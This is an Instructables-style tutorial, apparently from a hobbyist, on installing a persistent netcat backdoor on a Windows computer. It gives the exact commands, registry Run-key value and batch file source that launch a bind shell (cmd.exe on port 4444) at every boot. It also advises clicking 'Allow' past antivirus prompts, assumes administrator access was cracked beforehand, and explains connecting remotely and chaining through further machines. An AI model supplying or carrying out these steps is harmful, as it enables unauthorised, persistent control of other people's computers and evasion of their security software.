Netcat Fun!

by duct tape in Circuits > Websites

41254 Views, 47 Favorites, 0 Comments

Netcat Fun!

command_sucessful.jpg
This instructable shows you how to create a backdoor on a computer with netcat! I will show you two ways to do this, with and without my batch file that automates it for you. This instructable already assumes that you have already got root permissions on the computer, probably with a 0phcrack LiveCD here. Now, onto the instructable.

Download Netcat

I have saved you the trouble of 3 minutes of searching Google and have put nc.exe up on instructables for you to download. Optionally, you can also download nc.bat which is a batch file I have created to automate the process for you. Make sure that if you download nc.bat it is 464 bytes, because I kept on uploading versions and finding out something was wrong with it. If it is not 464 bytes, the program will not correspond with this instructable.

Downloads

With Nc.bat

command_sucessful.jpg
First, both files must be in the same directory for nc.bat to work properly. I suggest using a flash drive, or CD-ROM for this operation. I used a 512 mb geek squad flash drive for this, but that is just me. So, copy the files onto your external media device, and bring them to the computer that you have root on. Get on the media device and double-click nc.bat. This will copy the nc.exe file to the system32 folder, in the system root (usually C:\Windows or C:\WINNT) and make the necessary changes to the registry. Then write down the IP address. It will be something like '192.168.1.103', which is mine. Once this is done, reboot the machine and login. Then the anti-virus program may ask you if you want to allow/disallow the program. Click on 'Allow' or similar. Keep in mind that in this instructable, you can only telnet in from the local network of that computer. Then leave, or log off, or whatever else you want.

Without Nc.bat

regedit2.jpg
run_regedit.jpg
regedit3.jpg
cmd1.jpg
regedit.jpg
run_cmd.jpg
cmd.jpg
To do this, you have to have nc.exe on a CD or Flash drive. Go over to the computer, login, and plug in the flash drive or put in your CD.

From here, there are two ways: The polished-up graphical user interfaces of windows, or the dirty, old-fashioned way of the command prompt.

The dirty, old-fashioned command prompt way:
Pull up the command prompt by going to Start-->Run and type in:
        cmd.exe
Navigate your way to the flash or your CD drive. If you do not know which drive is which, right-click on the start button and click explore. Click on all the non-local drives in My Computer until you come to your flash/CD drive. Remember the letter of the drive and go back to the command prompt. Type in the letter of the drive followed by a colon, like this: K:
Then type in one line at a time, followed by hitting the return key:
copy nc.exe %systemroot%\system32\nc.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"

That was pretty much the installation. All you need to know now is the local IP address, which can easily be found by typing in the 'ipconfig' command and looking for something in the table like "192.168.1.103". Then reboot the machine and log back in. The anti-virus program might ask you if you want to allow/disallow. Click allow. Then you are free to do what you want with the computer.

The polished-up graphical interfaces of Windows

Right-click on the start button and click explore. Click on all the non-local drives in My Computer until you come to your flash/CD drive. Then right-click nc.exe and copy. Then go to the C drive and click on the Windows or WINNT folder. Then go to the system32 folder and paste nc.exe. Close that out, and go to Start-->Run. Type in regedit. Navigate through the folders to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Then right click an empty space and go to New-->String Value. Type whatever you want for the name, but for the value, type in:
%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe

That was pretty much the installation. All you need to know now is the local IP address, which can easily be found by typing in the 'ipconfig' command into the command prompt (Start-->Run:cmd.exe) and looking for something in the table like "192.168.1.103". Then reboot the machine and log back in. The anti-virus program might ask you if you want to allow/disallow. Click allow. Then you are free to do what you want with the computer.

Going Back In

Once you have it installed, and you want to take control of the host, open up the command prompt or PuTTY. I think PuTTY is awesome, so I will let you download it here.

Using PuTTY

Download and open PuTTY.exe. Click on the 'raw' protocol. In the port # text box, type in 4444. In the 'host address' box, type in the IP address you wrote down during installation. Then hit enter. PuTTY should connect to the box and you will get a command prompt.

Using Command Prompt

Open the command prompt and type in 'telnet <enter the IP address you wrote down here> 4444'.
Then hit enter, and you should get a command prompt.

This will let you do nearly anything you want to the computer remotely that you can do with a local account. It really starts to get interesting when you go into one computer, and then go into another computer from that computer, to get a whole chain of computers connected together.

Have (legal) fun!

Downloads

Source Code

Because I have been asked, I will put up the source code (for the batch file) and explain each command and what it does. Be Aware! This is the current version of the batch install program. If yours is different, the code will differ.

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 goto regeditgoto error:regeditreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"if errorlevel 0 goto ip:errorecho something unexpected has occurred, and the program needs to exit.goto end:ipecho write down the IP address from the tableipconfig:endecho end.echo duct tape out.pause
@echo off-Tells it not to show the commands when executing.
copy nc.exe %systemroot%\system32\nc.exe-usually copies netcat into C:\WINDOWS\system32. This makes it so when you go back in, instead of changing directories all the time, you can just type "nc" to open another port.
if errorlevel 0 goto regedit-error checking. If the copy was successful, It goes on to edit the registry.
goto error-If an error occured, go on to the :error label.
:regedit-A label, specifying that when the program says "goto regedit", to go here.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(supposed to be one line) that adds the registry key to restart the program when rebooted. /f means overwrite existing key, /v for key name, /d for data. The rest of the tags are input for netcat. -L says to restart it on exit, so you don't have to wait for the computer to restart. -d i forgot. -p 4444 specifies port #. -t i forgot. -e cmd.exe makes the command prompt start on remote connection.
if errorlevel 0 goto ip-error checking. If the run went wrong it would skip this line and go down to the :error label.
echo something unexpected has occurred, and the program needs to exit.-tells the program to print "something unexpected has occurred, and the program needs to exit" on the screen.
goto end-if it went to the error message, something went wrong and the program needs to close anyway.
:ip-Again, label.
echo write down the IP address from the table-Writes "write down the IP address from the table" to the screen.
ipconfig-This is a command that prints information about your local area network (LAN) settings.
:end-Label.
echo end.-writes "end" to the screen.
echo duct tape out.-writes "duct tape out" to the screen.
pause-this command pauses the program, and waits for the user to press a key. In this program, it waits for input and then exits the program.